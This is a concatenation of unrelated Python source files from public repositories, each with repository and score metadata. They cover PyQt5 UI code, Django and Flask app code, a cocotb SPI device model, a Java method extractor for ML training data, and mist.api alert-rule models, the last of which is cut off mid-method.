ui/Ui_main.py | realm520/aimless | 0 | 16946 | # -*- coding: utf-8 -*-
# Form implementation generated from reading ui file 'F:\work\code\pyqt5\ui\main.ui'
#
# Created by: PyQt5 UI code generator 5.9
#
# WARNING! All changes made in this file will be lost!
from PyQt5 import QtCore, QtGui, QtWidgets
class Ui_MainWindow(object):
def setupUi(self, MainWindow):
MainWindow.setObjectName("MainWindow")
MainWindow.resize(963, 727)
self.centralwidget = QtWidgets.QWidget(MainWindow)
self.centralwidget.setObjectName("centralwidget")
self.gridLayout = QtWidgets.QGridLayout(self.centralwidget)
self.gridLayout.setObjectName("gridLayout")
self.tabWidget = QtWidgets.QTabWidget(self.centralwidget)
sizePolicy = QtWidgets.QSizePolicy(QtWidgets.QSizePolicy.Preferred, QtWidgets.QSizePolicy.Preferred)
sizePolicy.setHorizontalStretch(1)
sizePolicy.setVerticalStretch(1)
sizePolicy.setHeightForWidth(self.tabWidget.sizePolicy().hasHeightForWidth())
self.tabWidget.setSizePolicy(sizePolicy)
self.tabWidget.setMinimumSize(QtCore.QSize(571, 0))
self.tabWidget.setMaximumSize(QtCore.QSize(16777215, 16777215))
self.tabWidget.setObjectName("tabWidget")
self.tab = QtWidgets.QWidget()
self.tab.setObjectName("tab")
self.verticalLayout = QtWidgets.QVBoxLayout(self.tab)
self.verticalLayout.setObjectName("verticalLayout")
self.label = QtWidgets.QLabel(self.tab)
self.label.setObjectName("label")
self.verticalLayout.addWidget(self.label)
self.txtRaw = QtWidgets.QTextEdit(self.tab)
self.txtRaw.setObjectName("txtRaw")
self.verticalLayout.addWidget(self.txtRaw)
self.groupBox = QtWidgets.QGroupBox(self.tab)
self.groupBox.setMinimumSize(QtCore.QSize(0, 0))
self.groupBox.setMaximumSize(QtCore.QSize(500, 16777215))
self.groupBox.setObjectName("groupBox")
self.horizontalLayout = QtWidgets.QHBoxLayout(self.groupBox)
self.horizontalLayout.setObjectName("horizontalLayout")
self.btnEncoding = QtWidgets.QPushButton(self.groupBox)
self.btnEncoding.setObjectName("btnEncoding")
self.horizontalLayout.addWidget(self.btnEncoding)
self.btnDecoding = QtWidgets.QPushButton(self.groupBox)
self.btnDecoding.setObjectName("btnDecoding")
self.horizontalLayout.addWidget(self.btnDecoding)
self.btnExchange = QtWidgets.QPushButton(self.groupBox)
self.btnExchange.setObjectName("btnExchange")
self.horizontalLayout.addWidget(self.btnExchange)
self.btnClear = QtWidgets.QPushButton(self.groupBox)
sizePolicy = QtWidgets.QSizePolicy(QtWidgets.QSizePolicy.Minimum, QtWidgets.QSizePolicy.Preferred)
sizePolicy.setHorizontalStretch(0)
sizePolicy.setVerticalStretch(0)
sizePolicy.setHeightForWidth(self.btnClear.sizePolicy().hasHeightForWidth())
self.btnClear.setSizePolicy(sizePolicy)
self.btnClear.setObjectName("btnClear")
self.horizontalLayout.addWidget(self.btnClear)
self.cboxCodecType = QtWidgets.QComboBox(self.groupBox)
self.cboxCodecType.setObjectName("cboxCodecType")
self.cboxCodecType.addItem("")
self.horizontalLayout.addWidget(self.cboxCodecType)
self.verticalLayout.addWidget(self.groupBox)
self.label_2 = QtWidgets.QLabel(self.tab)
self.label_2.setObjectName("label_2")
self.verticalLayout.addWidget(self.label_2)
self.txtResult = QtWidgets.QTextEdit(self.tab)
self.txtResult.setObjectName("txtResult")
self.verticalLayout.addWidget(self.txtResult)
self.tabWidget.addTab(self.tab, "")
self.tab_2 = QtWidgets.QWidget()
self.tab_2.setObjectName("tab_2")
self.verticalLayout_2 = QtWidgets.QVBoxLayout(self.tab_2)
self.verticalLayout_2.setObjectName("verticalLayout_2")
self.txtJson = QtWidgets.QTextEdit(self.tab_2)
self.txtJson.setObjectName("txtJson")
self.verticalLayout_2.addWidget(self.txtJson)
self.groupBox_2 = QtWidgets.QGroupBox(self.tab_2)
self.groupBox_2.setMinimumSize(QtCore.QSize(0, 50))
self.groupBox_2.setObjectName("groupBox_2")
self.horizontalLayout_2 = QtWidgets.QHBoxLayout(self.groupBox_2)
self.horizontalLayout_2.setObjectName("horizontalLayout_2")
self.btnJsonFormat = QtWidgets.QPushButton(self.groupBox_2)
self.btnJsonFormat.setObjectName("btnJsonFormat")
self.horizontalLayout_2.addWidget(self.btnJsonFormat)
self.btnJsonCompress = QtWidgets.QPushButton(self.groupBox_2)
self.btnJsonCompress.setObjectName("btnJsonCompress")
self.horizontalLayout_2.addWidget(self.btnJsonCompress)
self.btnJsonEscape = QtWidgets.QPushButton(self.groupBox_2)
self.btnJsonEscape.setObjectName("btnJsonEscape")
self.horizontalLayout_2.addWidget(self.btnJsonEscape)
self.btnJsonDeescape = QtWidgets.QPushButton(self.groupBox_2)
self.btnJsonDeescape.setObjectName("btnJsonDeescape")
self.horizontalLayout_2.addWidget(self.btnJsonDeescape)
self.btnJsonCopy = QtWidgets.QPushButton(self.groupBox_2)
self.btnJsonCopy.setObjectName("btnJsonCopy")
self.horizontalLayout_2.addWidget(self.btnJsonCopy)
self.btnJsonClear = QtWidgets.QPushButton(self.groupBox_2)
self.btnJsonClear.setObjectName("btnJsonClear")
self.horizontalLayout_2.addWidget(self.btnJsonClear)
self.verticalLayout_2.addWidget(self.groupBox_2)
self.tabWidget.addTab(self.tab_2, "")
self.gridLayout.addWidget(self.tabWidget, 0, 0, 1, 1)
MainWindow.setCentralWidget(self.centralwidget)
self.menubar = QtWidgets.QMenuBar(MainWindow)
self.menubar.setGeometry(QtCore.QRect(0, 0, 963, 23))
self.menubar.setObjectName("menubar")
MainWindow.setMenuBar(self.menubar)
self.statusbar = QtWidgets.QStatusBar(MainWindow)
self.statusbar.setObjectName("statusbar")
MainWindow.setStatusBar(self.statusbar)
self.retranslateUi(MainWindow)
self.tabWidget.setCurrentIndex(0)
self.btnClear.clicked.connect(self.txtResult.clear)
self.btnClear.clicked.connect(self.txtRaw.clear)
QtCore.QMetaObject.connectSlotsByName(MainWindow)
def retranslateUi(self, MainWindow):
_translate = QtCore.QCoreApplication.translate
MainWindow.setWindowTitle(_translate("MainWindow", "MainWindow"))
self.label.setText(_translate("MainWindow", "Raw Text:"))
self.groupBox.setTitle(_translate("MainWindow", "Operation"))
self.btnEncoding.setText(_translate("MainWindow", "Encoding"))
self.btnDecoding.setText(_translate("MainWindow", "Decoding"))
self.btnExchange.setText(_translate("MainWindow", "Exchange"))
self.btnClear.setText(_translate("MainWindow", "Clear"))
self.cboxCodecType.setItemText(0, _translate("MainWindow", "Base64"))
self.label_2.setText(_translate("MainWindow", "Result Text:"))
self.tabWidget.setTabText(self.tabWidget.indexOf(self.tab), _translate("MainWindow", "Codec"))
self.groupBox_2.setTitle(_translate("MainWindow", "Operation"))
self.btnJsonFormat.setText(_translate("MainWindow", "Format"))
self.btnJsonCompress.setText(_translate("MainWindow", "Compress"))
self.btnJsonEscape.setText(_translate("MainWindow", "Escape"))
self.btnJsonDeescape.setText(_translate("MainWindow", "De-Escape"))
self.btnJsonCopy.setText(_translate("MainWindow", "Copy"))
self.btnJsonClear.setText(_translate("MainWindow", "Clear"))
self.tabWidget.setTabText(self.tabWidget.indexOf(self.tab_2), _translate("MainWindow", "Json"))
if __name__ == "__main__":
import sys
app = QtWidgets.QApplication(sys.argv)
MainWindow = QtWidgets.QMainWindow()
ui = Ui_MainWindow()
ui.setupUi(MainWindow)
MainWindow.show()
sys.exit(app.exec_())
| 1.773438 | 2 |
leetcode/345.reverse-vowels-of-a-string.py | geemaple/algorithm | 177 | 16947 | class Solution(object):
def reverseVowels(self, s):
"""
:type s: str
:rtype: str
"""
vowels = set("aeiouAEIOU")
s = list(s)
i = 0
j = len(s) - 1
while i < j:
while i < j and s[i] not in vowels:
i += 1
while i < j and s[j] not in vowels:
j -= 1
if i < j:
s[i], s[j] = s[j], s[i]
i += 1
j -= 1
return ''.join(s) | 3.203125 | 3 |
examples/02_pybind/01_basic/example.py | BlockResearchGroup/WS_interoperability | 1 | 16948 | <reponame>BlockResearchGroup/WS_interoperability<filename>examples/02_pybind/01_basic/example.py
# example.py
import basic
result = basic.add(1, 5)
print(result)
| 1.84375 | 2 |
cocotbext/spi/devices/TI/DRV8304.py | eoshea/cocotbext-spi | 2 | 16949 | <reponame>eoshea/cocotbext-spi<filename>cocotbext/spi/devices/TI/DRV8304.py
import cocotb
from cocotb.triggers import FallingEdge, RisingEdge, First, Timer, Event
from ... import SpiSlaveBase, SpiConfig, SpiFrameError, SpiFrameTimeout
class DRV8304(SpiSlaveBase):
def __init__(self, signals):
self._config = SpiConfig(
word_width=16,
cpol=False,
cpha=True,
msb_first=True,
frame_spacing_ns=400
)
self._registers = {
0: 0b00000000000,
1: 0b00000000000,
2: 0b00000000000,
3: 0b01101110111,
4: 0b11101110111,
5: 0b00101000101,
6: 0b01010000011
}
super().__init__(signals)
async def get_register(self, reg_num):
await self.idle.wait()
return self._registers[reg_num]
def create_spi_word(self, operation, address, content):
command = 0
if operation == "read":
command |= 1 << 15
elif operation == "write":
# it is already 0
pass
else:
raise ValueError("Expected operation to be in ['read', 'write']")
try:
self._registers[address]
except KeyError:
raise ValueError(f"Expected address to be in {list(self._registers.keys())}")
command |= (address & 0b1111) << 11
command |= (content & 0b11111111111)
return command
async def _transaction(self, frame_start, frame_end):
await frame_start
self.idle.clear()
# SCLK pin should be low at the chip select edge
if bool(self._sclk.value):
raise SpiFrameError("DRV8304: sclk should be low at chip select edge")
do_write = not bool(await self._shift(1))
address = int(await self._shift(4))
content = int(await self._shift(11, tx_word=self._registers[address]))
# end of frame
if await First(frame_end, RisingEdge(self._sclk)) != frame_end:
raise SpiFrameError("DRV8304: clocked more than 16 bits")
if bool(self._sclk.value):
raise SpiFrameError("DRV8304: sclk should be low at chip select edge")
if do_write:
self._registers[address] = content
| 2.234375 | 2 |
manage.py | Kenneth-joseph/Blogs | 0 | 16950 | <filename>manage.py
from app import create_app,db
from flask_script import Manager,Server
from app.models import User,Comment,Blog
from flask_migrate import Migrate, MigrateCommand
#manage.shell
# Creating app instance
app = create_app('production')
migrate = Migrate(app,db)
manager = Manager(app)
manager.add_command('db',MigrateCommand)
manager.add_command('server',Server)
@manager.shell
def make_shell_context():
return dict(db=db,app= app, User = User ,Comment=Comment, Blog=Blog)
if __name__== '__main__':
manager.run()
db.create_all() | 2.296875 | 2 |
src/apps/core/migrations/0005_auto_20180417_1219.py | zhiyuli/HydroLearn | 0 | 16951 | <reponame>zhiyuli/HydroLearn<filename>src/apps/core/migrations/0005_auto_20180417_1219.py
# -*- coding: utf-8 -*-
# Generated by Django 1.11.7 on 2018-04-17 17:19
from __future__ import unicode_literals
from django.db import migrations
import django_extensions.db.fields
class Migration(migrations.Migration):
dependencies = [
('core', '0004_auto_20180417_1218'),
]
operations = [
migrations.AddField(
model_name='topic',
name='ref_id',
field=django_extensions.db.fields.RandomCharField(blank=True, editable=False, length=8, unique=True),
),
migrations.AlterField(
model_name='topic',
name='slug',
field=django_extensions.db.fields.AutoSlugField(blank=True, default='', editable=False, help_text='Please enter a unique slug for this Topic (can autogenerate from name field)', max_length=64, populate_from=('ref_id',), unique=True, verbose_name='slug'),
),
]
| 1.75 | 2 |
syncgateway/__init__.py | ecordell/syncgateway-admin-client | 0 | 16952 | __author__ = '<NAME>'
__copyright__ = 'Copyright 2012-2015 Localmed, Inc.'
__version__ = "0.1.6"
__version_info__ = tuple(__version__.split('.'))
__short_version__ = __version__
| 1.171875 | 1 |
members/views.py | leonrenkema/makerspaceleiden-crm | 5 | 16953 | <filename>members/views.py
from django.shortcuts import render, redirect
from django.contrib.auth.forms import PasswordResetForm
from django.core.mail import EmailMessage
from django.template import loader
from django.http import HttpResponse
from django.contrib.auth.decorators import login_required
from django.conf import settings
from django.db.utils import IntegrityError
from django.urls import reverse
from django.template.loader import render_to_string, get_template
from .forms import NewUserForm, NewAuditRecordForm
from acl.models import Entitlement, PermitType
from members.models import Tag, User, clean_tag_string, AuditRecord
from mailinglists.models import Mailinglist, Subscription
import logging
import datetime
import sys
import re
logger = logging.getLogger(__name__)
@login_required
def index(request):
lst = Entitlement.objects.order_by("holder__id")
agg = {}
perms = {}
output = ""
for e in lst:
if not e.holder in agg:
agg[e.holder] = {}
perms[e.permit.name] = 1
agg[e.holder][e.permit.name] = 1
context = {
"agg": agg,
"perms": perms,
"has_permission": request.user.is_authenticated,
}
return render(request, "members/index.html", context)
@login_required
def newmember(request):
if not request.user.is_privileged:
return HttpResponse("XS denied", status=403, content_type="text/plain")
if request.POST:
form = NewUserForm(request.POST)
if form.is_valid():
try:
email = form.cleaned_data.get("email")
tag = form.cleaned_data.get("tag")
newmember = User.objects.create_user(
email=email,
first_name=form.cleaned_data.get("first_name"),
last_name=form.cleaned_data.get("last_name"),
)
# Do not set this - it silently blocks the invite mails deep in PasswordResetForm.
#
# newmember.set_unusable_password()
#
newmember.set_password(User.objects.make_random_password())
if form.cleaned_data.get("phone_number"):
newmember.phone_number = form.cleaned_data.get("phone_number")
newmember.changeReason = (
"Added by {} with the newnmeber signup form".format(request.user)
)
newmember.save()
# sanity check.
newmember = User.objects.get(email=email)
# Wire up the tag if one was provided.
if form.cleaned_data.get("tag"):
tag.reassing_to_user(
newmember,
request.user,
activate=form.cleaned_data.get("activate_doors"),
)
# Subscribe user if needed
for mlist_name in form.cleaned_data.get("mailing_lists"):
try:
mlist = Mailinglist.objects.get(name=mlist_name)
s = Subscription.objects.create(
mailinglist=mlist,
member=newmember,
active=True,
digest=False,
)
s.subscribe()
# s.changeReason("Subscribed during form based new user create")
s.save()
except Exception as e:
logger.error(
"Failed to subscribe user {} to {} : {}".format(
request.user, mlist_name, e
)
)
# Send welcome email.
form = PasswordResetForm({"email": newmember.email})
if not form.is_valid():
raise Exception("Internal issue")
form.save(
from_email=settings.DEFAULT_FROM_EMAIL,
email_template_name="members/email_newmembers_invite.txt",
subject_template_name="members/email_newmembers_invite_subject.txt",
)
return redirect("index")
except IntegrityError as e:
logger.error("Failed to create user : {}".format(e))
return HttpResponse(
"Create gone wrong. Was that email or name already added ?",
status=500,
content_type="text/plain",
)
except Exception as e:
exc_type, exc_obj, tb = sys.exc_info()
f = tb.tb_frame
lineno = tb.tb_lineno
filename = f.f_code.co_filename
logger.error(
"Failed to create user : {} at {}:{}".format(filename, lineno, e)
)
return HttpResponse(
"Create gone wrong. Drat.", status=500, content_type="text/plain"
)
else:
logger.debug("Form not valid")
context = {
"label": "Add a new member",
"title": "New Member",
"action": "Invite",
"has_permission": request.user.is_authenticated,
}
context["form"] = NewUserForm()
return render(request, "members/newmember.html", context)
@login_required
def sudo(request):
if not request.user.can_escalate_to_priveleged:
return HttpResponse("XS denied", status=403, content_type="text/plain")
if request.POST:
form = NewAuditRecordForm(request.POST)
if form.is_valid():
try:
record = form.save(commit=False)
record.user = request.user
record.changeReason = (
f"SUDO escalation in webinterface by {request.user}"
)
record.save()
return redirect(form.cleaned_data.get("return_to"))
# return redirect('index')
except Exception as e:
logger.error("Failed to create uudit recordser : {}".format(e))
return HttpResponse(
"Could not create audit record.",
status=500,
content_type="text/plain",
)
rurl = reverse("index")
if "HTTP_REFERER" in request.META:
rurl = request.META["HTTP_REFERER"]
form = NewAuditRecordForm(None, initial={"return_to": rurl})
context = {
"label": "GDPR (AVG)",
"title": "Become and admin",
"action": "go admin",
"form": form,
"back": "index",
"has_permission": request.user.is_authenticated,
"preamble": render_to_string("precooked_gdpr_options.html"),
}
return render(request, "crud.html", context)
def drop(request):
if not request.user.can_escalate_to_priveleged:
return HttpResponse("XS denied", status=403, content_type="text/plain")
record = AuditRecord(
user=request.user, final=True, action="Drop privs from webinterface"
)
if request.user.is_privileged:
record.changereason = f"DROP in webinterface by {request.user}"
else:
record.changereason = f"DROP in webinterface by {request.user} - but actual permission had already timed out."
record.save()
return redirect(request.META["HTTP_REFERER"])
| 2.0625 | 2 |
test_scripts/ns_instance/duan/service/vfc/nfvo/lcm/lcm/ns/views/deprecated/create_ns_view.py | lremember/VFC | 1 | 16954 | # Copyright 2018 ZTE Corporation.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import logging
from drf_yasg.utils import swagger_auto_schema
from rest_framework import status
from rest_framework.response import Response
from rest_framework.views import APIView
from lcm.ns.biz.ns_create import CreateNSService
from lcm.ns.biz.ns_get import GetNSInfoService
from lcm.ns.serializers.deprecated.ns_serializers import _CreateNsReqSerializer
from lcm.ns.serializers.deprecated.ns_serializers import _CreateNsRespSerializer
from lcm.ns.serializers.deprecated.ns_serializers import _QueryNsRespSerializer
from lcm.pub.exceptions import NSLCMException
from lcm.pub.exceptions import BadRequestException
from lcm.pub.utils.values import ignore_case_get
from .common import view_safe_call_with_log
logger = logging.getLogger(__name__)
class CreateNSView(APIView):
@swagger_auto_schema(
request_body=None,
responses={
status.HTTP_200_OK: _QueryNsRespSerializer(help_text="NS instances", many=True),
status.HTTP_500_INTERNAL_SERVER_ERROR: "Inner error"
}
)
@view_safe_call_with_log(logger=logger)
def get(self, request):
logger.debug("CreateNSView::get")
ret = GetNSInfoService().get_ns_info()
logger.debug("CreateNSView::get::ret=%s", ret)
resp_serializer = _QueryNsRespSerializer(data=ret, many=True)
if not resp_serializer.is_valid():
raise NSLCMException(resp_serializer.errors)
return Response(data=resp_serializer.data, status=status.HTTP_200_OK)
@swagger_auto_schema(
request_body=_CreateNsReqSerializer(),
responses={
status.HTTP_201_CREATED: _CreateNsRespSerializer(),
status.HTTP_400_BAD_REQUEST: "Bad Request",
status.HTTP_500_INTERNAL_SERVER_ERROR: "Inner error"
}
)
@view_safe_call_with_log(logger=logger)
def post(self, request):
logger.debug("Enter CreateNS: %s", request.data)
req_serializer = _CreateNsReqSerializer(data=request.data)
if not req_serializer.is_valid():
raise BadRequestException(req_serializer.errors)
if ignore_case_get(request.data, 'test') == "test":
return Response(
data={'nsInstanceId': "test"},
status=status.HTTP_201_CREATED
)
csar_id = ignore_case_get(request.data, 'csarId')
ns_name = ignore_case_get(request.data, 'nsName')
description = ignore_case_get(request.data, 'description')
context = ignore_case_get(request.data, 'context')
ns_inst_id = CreateNSService(
csar_id,
ns_name,
description,
context
).do_biz()
logger.debug("CreateNSView::post::ret={'nsInstanceId':%s}", ns_inst_id)
resp_serializer = _CreateNsRespSerializer(
data={'nsInstanceId': ns_inst_id,
'nsInstanceName': 'nsInstanceName',
'nsInstanceDescription': 'nsInstanceDescription',
'nsdId': 123,
'nsdInfoId': 456,
'nsState': 'NOT_INSTANTIATED',
'_links': {'self': {'href': 'href'}}})
if not resp_serializer.is_valid():
raise NSLCMException(resp_serializer.errors)
return Response(data=resp_serializer.data, status=status.HTTP_201_CREATED)
| 1.53125 | 2 |
parse_training_input.py | alexpotter1/vulndetect-ml | 1 | 16955 | #!/usr/bin/env python3
import javalang
def isPrimitive(obj):
return not hasattr(obj, '__dict__')
def extract_bad_function_from_text(src):
return extract_function_from_text(src, criterion='bad')
def extract_function_from_text(src, criterion='bad'):
def recursive_find_deepest_child_position(node_body, prev_deepest=0):
child_direct_child_set = None
# line number, don't currently care about column too much
if isinstance(node_body, list):
deepest_position = prev_deepest
node_children = [c for c in node_body if c is not isPrimitive(c) and c is not None]
if len(node_children) == 0:
return deepest_position
else:
if node_body.position is not None:
deepest_position = node_body.position.line
else:
deepest_position = prev_deepest
node_children = [c for c in node_body.children if c is not isPrimitive(c) and c is not None]
if len(node_children) == 0:
return deepest_position
for child in node_children:
try:
if child.position is not None:
child_sub_pos = child.position.line
else:
child_sub_pos = deepest_position
child_direct_child_set = child.children
except AttributeError:
# most likely is not an object
child_sub_pos = deepest_position
if isinstance(child, list):
child_direct_child_set = child
else:
child_direct_child_set = []
if len(child_direct_child_set) > 0:
child_sub_pos = recursive_find_deepest_child_position(child_direct_child_set, prev_deepest=child_sub_pos)
if child_sub_pos > deepest_position:
deepest_position = child_sub_pos
return deepest_position
if not isinstance(src, str):
src = src.decode('utf-8')
src_split = src.split('\n')
try:
tree = javalang.parse.parse(src)
for _, node in tree.filter(javalang.tree.MethodDeclaration):
if node.name.lower() == str(criterion).lower():
# tokenise, find the start/end of method,
# and extract from the file
# needed since javalang can't convert back to java src
start_pos = node.position.line
end_pos = None
if (len(node.body) > 0):
end_pos = recursive_find_deepest_child_position(node.body[-1])
if end_pos is None:
end_pos = start_pos
function_text = ""
for line in range(start_pos, end_pos + 1):
function_text += src_split[line - 1]
return function_text
return ""
except (javalang.parser.JavaSyntaxError,
javalang.parser.JavaParserError) as e:
print("ERROR OCCURRED DURING PARSING")
print(e)
def extract_bad_function(file_path):
return extract_function(file_path, criterion='bad')
def extract_function(file_path, criterion):
with open(file_path, 'r') as f:
return extract_function_from_text(f.read(), criterion)
| 2.96875 | 3 |
src/mist/api/rules/models/main.py | SpiralUp/mist.api | 6 | 16956 | <gh_stars>1-10
import uuid
import mongoengine as me
from mist.api import config
from mist.api.exceptions import BadRequestError
from mist.api.users.models import Organization
from mist.api.selectors.models import SelectorClassMixin
from mist.api.rules.base import NoDataRuleController
from mist.api.rules.base import ResourceRuleController
from mist.api.rules.base import ArbitraryRuleController
from mist.api.rules.models import RuleState
from mist.api.rules.models import Window
from mist.api.rules.models import Frequency
from mist.api.rules.models import TriggerOffset
from mist.api.rules.models import QueryCondition
from mist.api.rules.models import BaseAlertAction
from mist.api.rules.models import NotificationAction
from mist.api.rules.plugins import GraphiteNoDataPlugin
from mist.api.rules.plugins import GraphiteBackendPlugin
from mist.api.rules.plugins import InfluxDBNoDataPlugin
from mist.api.rules.plugins import InfluxDBBackendPlugin
from mist.api.rules.plugins import ElasticSearchBackendPlugin
from mist.api.rules.plugins import FoundationDBNoDataPlugin
from mist.api.rules.plugins import FoundationDBBackendPlugin
from mist.api.rules.plugins import VictoriaMetricsNoDataPlugin
from mist.api.rules.plugins import VictoriaMetricsBackendPlugin
class Rule(me.Document):
"""The base Rule mongoengine model.
The Rule class defines the base schema of all rule types. All documents of
any Rule subclass will be stored in the same mongo collection.
All Rule subclasses MUST define a `_controller_cls` class attribute and a
backend plugin. Controllers are used to perform actions on instances of
Rule, such as adding or updating. Backend plugins are used to transform a
Rule into the corresponding query to be executed against a certain data
storage. Different types of rules, such as a rule on monitoring metrics or
a rule on logging data, should also define and utilize their respective
backend plugins. For instance, a rule on monitoring data, which is stored
in a TSDB like Graphite, will have to utilize a different plugin than a
rule on logging data, stored in Elasticsearch, in order to successfully
query the database.
The Rule class is mainly divided into two categories:
1. Arbitrary rules - defined entirely by the user. This type of rules gives
users the freedom to execute arbitrary queries on arbitrary data. The query
may include (nested) expressions and aggregations on arbitrary fields whose
result will be evaluated against a threshold based on a comparison operator
(=, <, etc).
2. Resource rules - defined by using Mist.io UUIDs and tags. This type of
rules can be used to easily setup alerts on resources given their tags or
UUIDs. In this case, users have to explicitly specify the target metric's
name, aggregation function, and resources either by their UUIDs or tags.
This type of rules allows for easier alert configuration on known resources
in the expense of less elastic query expressions.
The Rule base class can be used to query the database and fetch documents
created by any Rule subclass. However, in order to add new rules one must
use one of the Rule subclasses, which represent different rule type, each
associated with the corresponding backend plugin.
"""
id = me.StringField(primary_key=True, default=lambda: uuid.uuid4().hex)
title = me.StringField(required=True)
owner_id = me.StringField(required=True)
# Specifies a list of queries to be evaluated. Results will be logically
# ANDed together in order to decide whether an alert should be raised.
queries = me.EmbeddedDocumentListField(QueryCondition, required=True)
# Defines the time window and frequency of each search.
window = me.EmbeddedDocumentField(Window, required=True)
frequency = me.EmbeddedDocumentField(Frequency, required=True)
# Associates a reminder offset, which will cause an alert to be fired if
# and only if the threshold is exceeded for a number of trigger_after
# intervals.
trigger_after = me.EmbeddedDocumentField(
TriggerOffset, default=lambda: TriggerOffset(period='minutes')
)
# Defines a list of actions to be executed once the rule is triggered.
# Defaults to just notifying the users.
actions = me.EmbeddedDocumentListField(
BaseAlertAction, required=True, default=lambda: [NotificationAction()]
)
# Disable the rule organization-wide.
disabled = me.BooleanField(default=False)
# Fields passed to scheduler as optional arguments.
queue = me.StringField()
exchange = me.StringField()
routing_key = me.StringField()
# Fields updated by the scheduler.
last_run_at = me.DateTimeField()
run_immediately = me.BooleanField()
total_run_count = me.IntField(min_value=0, default=0)
total_check_count = me.IntField(min_value=0, default=0)
# Field updated by dramatiq workers. This is where workers keep state.
states = me.MapField(field=me.EmbeddedDocumentField(RuleState))
meta = {
'strict': False,
'collection': 'rules',
'allow_inheritance': True,
'indexes': [
'owner_id',
{
'fields': ['owner_id', 'title'],
'sparse': False,
'unique': True,
'cls': False,
}
]
}
_controller_cls = None
_backend_plugin = None
_data_type_str = None
def __init__(self, *args, **kwargs):
super(Rule, self).__init__(*args, **kwargs)
if self._controller_cls is None:
raise TypeError(
"Cannot instantiate self. %s is a base class and cannot be "
"used to insert or update alert rules and actions. Use a "
"subclass of self that defines a `_controller_cls` class "
"attribute derived from `mist.api.rules.base:BaseController`, "
"instead." % self.__class__.__name__
)
if self._backend_plugin is None:
raise NotImplementedError(
"Cannot instantiate self. %s does not define a backend_plugin "
"in order to evaluate rules against the corresponding backend "
"storage." % self.__class__.__name__
)
if self._data_type_str not in ('metrics', 'logs', ):
raise TypeError(
"Cannot instantiate self. %s is a base class and cannot be "
"used to insert or update rules. Use a subclass of self that "
"defines a `_backend_plugin` class attribute, as well as the "
"requested data's type via the `_data_type_str` attribute, "
"instead." % self.__class__.__name__
)
self.ctl = self._controller_cls(self)
@classmethod
def add(cls, auth_context, title=None, **kwargs):
"""Add a new Rule.
New rules should be added by invoking this class method on a Rule
subclass.
Arguments:
owner: instance of mist.api.users.models.Organization
title: the name of the rule. This must be unique per Organization
kwargs: additional keyword arguments that will be passed to the
corresponding controller in order to setup the self
"""
try:
cls.objects.get(owner_id=auth_context.owner.id, title=title)
except cls.DoesNotExist:
rule = cls(owner_id=auth_context.owner.id, title=title)
rule.ctl.set_auth_context(auth_context)
rule.ctl.add(**kwargs)
else:
raise BadRequestError('Title "%s" is already in use' % title)
return rule
@property
def owner(self):
"""Return the Organization (instance) owning self.
We refrain from storing the owner as a me.ReferenceField in order to
avoid automatic/unwanted dereferencing.
"""
return Organization.objects.get(id=self.owner_id)
@property
def org(self):
"""Return the Organization (instance) owning self.
"""
return self.owner
@property
def plugin(self):
"""Return the instance of a backend plugin.
Subclasses MUST define the plugin to be used, instantiated with `self`.
"""
return self._backend_plugin(self)
# NOTE The following properties are required by the scheduler.
@property
def name(self):
"""Return the name of the task.
"""
return 'Org(%s):Rule(%s)' % (self.owner_id, self.id)
@property
def task(self):
"""Return the dramatiq task to run.
This is the most basic dramatiq task that should be used for most rule
evaluations. However, subclasses may provide their own property or
class attribute based on their needs.
"""
return 'mist.api.rules.tasks.evaluate'
@property
def args(self):
"""Return the args of the dramatiq task."""
return (self.id, )
@property
def kwargs(self):
"""Return the kwargs of the dramatiq task."""
return {}
@property
def expires(self):
"""Return None to denote that self is not meant to expire."""
return None
@property
def enabled(self):
"""Return True if the dramatiq task is currently enabled.
Subclasses MAY override or extend this property.
"""
return not self.disabled
def is_arbitrary(self):
"""Return True if self is arbitrary.
Arbitrary rules lack a list of `selectors` that refer to resources
either by their UUIDs or by tags. Such a list makes it easy to setup
rules referencing specific resources without the need to provide the
raw query expression.
"""
return 'selectors' not in type(self)._fields
def clean(self):
# FIXME This is needed in order to ensure rule name convention remains
# backwards compatible with the old monitoring stack. However, it will
# have to change in the future due to uniqueness constrains.
if not self.title:
self.title = 'rule%d' % self.owner.rule_counter
def as_dict(self):
return {
'id': self.id,
'title': self.title,
'queries': [query.as_dict() for query in self.queries],
'window': self.window.as_dict(),
'frequency': self.frequency.as_dict(),
'trigger_after': self.trigger_after.as_dict(),
'actions': [action.as_dict() for action in self.actions],
'disabled': self.disabled,
'data_type': self._data_type_str,
}
def __str__(self):
return '%s %s of %s' % (self.__class__.__name__,
self.title, self.owner)
class ArbitraryRule(Rule):
"""A rule defined by a single, arbitrary query string.
Arbitrary rules permit the definition of complex query expressions by
allowing users to define fully qualified queries in "raw mode" as a
single string. In such case, a query expression may be a composite query
that includes nested aggregations and/or additional queries.
An `ArbitraryRule` must define a single `QueryCondition`, whose `target`
defines the entire query expression as a single string.
"""
_controller_cls = ArbitraryRuleController
class ResourceRule(Rule, SelectorClassMixin):
"""A rule bound to a specific resource type.
Resource-bound rules are less elastic than arbitrary rules, but allow
users to perform quick, more dynamic filtering given a resource object's
UUID, tags, or model fields.
Every subclass of `ResourceRule` MUST define its `selector_resource_cls`
class attribute in order for queries to be executed against the intended
mongodb collection.
A `ResourceRule` may also apply to multiple resources, which depends on
the rule's list of `selectors`. By default such a rule will trigger an
alert if just one of its queries evaluates to True.
"""
_controller_cls = ResourceRuleController
@property
def enabled(self):
return (super(ResourceRule, self).enabled and
bool(self.get_resources().count()))
def clean(self):
# Enforce singular resource types for uniformity.
if self.resource_model_name.endswith('s'):
self.resource_model_name = self.resource_model_name[:-1]
super(ResourceRule, self).clean()
def as_dict(self):
d = super(ResourceRule, self).as_dict()
d['selectors'] = [cond.as_dict() for cond in self.selectors]
d['resource_type'] = self.resource_model_name
return d
# FIXME All following properties are for backwards compatibility.
@property
def metric(self):
assert len(self.queries) is 1
return self.queries[0].target
@property
def operator(self):
assert len(self.queries) is 1
return self.queries[0].operator
@property
def value(self):
assert len(self.queries) is 1
return self.queries[0].threshold
@property
def aggregate(self):
assert len(self.queries) is 1
return self.queries[0].aggregation
@property
def reminder_offset(self):
return self.frequency.timedelta.total_seconds() - 60
@property
def action(self):
for action in reversed(self.actions):
